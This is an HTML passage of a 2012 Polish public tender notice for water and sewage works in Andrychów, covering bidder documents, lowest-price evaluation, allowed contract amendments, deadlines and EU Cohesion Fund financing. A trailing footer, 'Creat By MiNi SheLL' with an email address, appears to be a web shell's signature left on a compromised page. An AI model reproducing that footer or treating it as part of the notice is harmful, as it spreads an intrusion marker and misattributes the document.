5) W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia dokument ustanawiający pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia. 
6) Dowód wpłacenia wadium w przypadku wyboru formy pieniężnej określonej w Rozdziale 12 - Forma wadium pkt. 1a.
7) Oryginał gwarancji/poręczenia w przypadku wyboru formy wadium określonej w Rozdziale 12 - Forma wadium pkt. 1b, 1c, 1d, 1e.
8)Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów,niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia według wzoru - załącznik nr 7 do IDW.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Zgodnie z art. 139 i 140 ustawy Pzp. Umowa w sprawie zamówienia publicznego

1) zostanie zawarta w formie pisemnej
2) mają do niej zastosowanie przepisy Kodeksu cywilnego, jeżeli przepisy ustawy nie stanowią inaczej
3) jest jawna i podlega udostępnieniu na zasadach określonych w przepisach o dostępie do informacji  publicznej
4) zakres świadczenia Wykonawcy wynikający z umowy jest tożsamy z jego         zobowiązaniem zawartym w ofercie
5) jest zawarta na okres wskazany w Części II do niniejszej SIWZ - wzór umowy w sprawie zamówienia publicznego
6) będzie podlegać unieważnieniu w przypadkach wskazanych w art. 140 ust.3 oraz art.146 ustawy Pzp
2. Przed podpisaniem Umowy w sprawie zamówienia publicznego Wykonawca przedłoży Inżynierowi Kontraktu do zatwierdzenia harmonogram rzeczowo-finansowy, o którym mowa w  § 2 ust. 5 wzoru umowy - Część II do SIWZ.
3. Zamawiający przewiduje możliwość zmiany Umowy w sprawie zamówienia publicznego w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy.
4. Zmiany umowy o której mowa w pkt 3 mogą nastąpić w przypadku spełnienia łącznie poniższych warunków:
a) Zamawiający wyrazi zgodę na zmianę Umowy,
b) zmiany zostaną dokonane na piśmie w formie aneksu do Umowy,
c) okoliczności uzasadniające dokonanie zmiany zostaną wskazane w preambule aneksu do Umowy,
d) konieczność dokonania zmian uzasadniona będzie, co najmniej jedną z okoliczności wskazanych w pkt 5.
5. Zmiana Umowy może nastąpić w przypadku zaistnienia co najmniej jednej z następujących okoliczności:
1) zmiany osób określonych w § 3 ust. 2 i 3 wzoru umowy - Część II do SIWZ (np. w przypadku  śmierci osoby, długotrwałej choroby uniemożliwiającej pracę, ustania stosunku pracy itp.), nowa osoba musi spełniać wymagania określone w Specyfikacji Istotnych Warunków Zamówienia oraz w zakresie posiadanego doświadczenia; zapis § 4 ust. 2 pkt. 1 wzoru umowy stosuje się odpowiednio,
2) wydłużenia terminu realizacji umowy, o którym mowa w § 2 ust. 1 tylko w sytuacji, gdy konieczność wydłużenia tego terminu wynika z przyczyn niezależnych od Wykonawcy ( w szczególności w przypadku wystąpienia okoliczności takich jak: zmiany w dokumentacji projektowej, warunki atmosferyczne uniemożliwiające wykonanie robót),
3) zmiany w harmonogramie rzeczowo-finansowym możliwe w przypadku np. zmian terminu wykonania umowy, zmian w kolejności realizacji poszczególnych robót - zmiany nie mogą powodować pogorszenia jakości lub bezpieczeństwa wykonywania robót,
4) wystąpienia uzasadnionej konieczności zmiany któregokolwiek z terminów wskazanych w umowie, w tym terminu wykonania przedmiotu Umowy, spowodowanej zmianą terminów realizacji Projektu, okresu kwalifikowania wydatków lub okresu obowiązywania Umowy o dofinansowanie,
5) zmiany waluty w jakiej następuje płatność - możliwa wyłącznie w przypadku jeżeli zapłata wynagrodzenia w walucie PLN nie będzie możliwa z powodu przyjęcia przez Polskę waluty euro jako obowiązującego środka płatniczego (zmiana taka musi nastąpić na podstawie przepisów prawnych obowiązujących w tym zakresie),
6)  zmiany zakresu robót (części zamówienia) powierzonych podwykonawcom - możliwa tylko w uzasadnionych przypadkach,
7) zmiany Umowy dotyczą poprawienia błędów i oczywistych omyłek słownych, literowych i liczbowych, zmiany układu graficznego umowy lub numeracji jednostek redakcyjnych, nie powodujące zmiany celu i istoty umowy,
8)  w przypadku zmiany lub wprowadzenia nowych powszechnie obowiązujących przepisów prawa krajowego i wspólnotowego oraz wytycznych, zaleceń i dokumentów programowych Funduszu Spójności, których wprowadzenie lub zmiana nastąpiły po dniu zawarcia umowy,a z treści których wynika konieczność lub zasadność ujęcia ich w umowie,
9) w przypadku, gdy konieczność zmiany umowy wynikać będzie z umów, wytycznych,zaleceń, decyzji lub innych dokumentów, którymi stroną lub autorem będą instytucje finansujące Projekt,
10) w przypadku zmiany, rozwiązania, odstąpienia, wygaśnięcia lub stwierdzenia nieważności umowy o dofinansowanie,
11) podczas wykonania przedmiotu umowy zaistnieje konieczność uszczegółowienia, wykładni lub doprecyzowania poszczególnych zapisów umowy, niepowodujących zmiany celu i istoty umowy,
12)  w przypadku zmiany formy zabezpieczenia należytego wykonania umowy z zachowaniem ciągłości zabezpieczenia i bez zmniejszenia jego wysokości, na zasadach określonych w ustawie Pzp
13)  w przypadku wystąpienia siły wyższej, o której mowa w  § 14 ust. 2 wzoru umowy -Część II do SIWZ</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.zwik.andrychow.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> ul. Stefana Batorego 68
34-120 Andrychów
pok. nr 25
lub pobrać ze strony internetowej Zamawiającego.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 24.09.2012 godzina 11:00, miejsce: Zakład Wodociągów i Kanalizacji s. z o.o.
ul. Stefana Batorego 68
34-120 Andrychów
pok. nr 1 sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt Budowa i Modernizacja Systemu Gospodarki Wodno-Ściekowej w Gminie Andrychów nr POIS.01.01.00-258/09-00 realizowany będzie w ramach działania I Gospodarka wodno-ściekowa w aglomeracjach powyżej 15 tys. RLM priorytet I Gospodarka wodno-ściekowa Programu Operacyjnego Infrastruktura i Środowisko 2007-2013 współfinansowanego ze środków Unii Europejskiej Funduszu Spójności.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com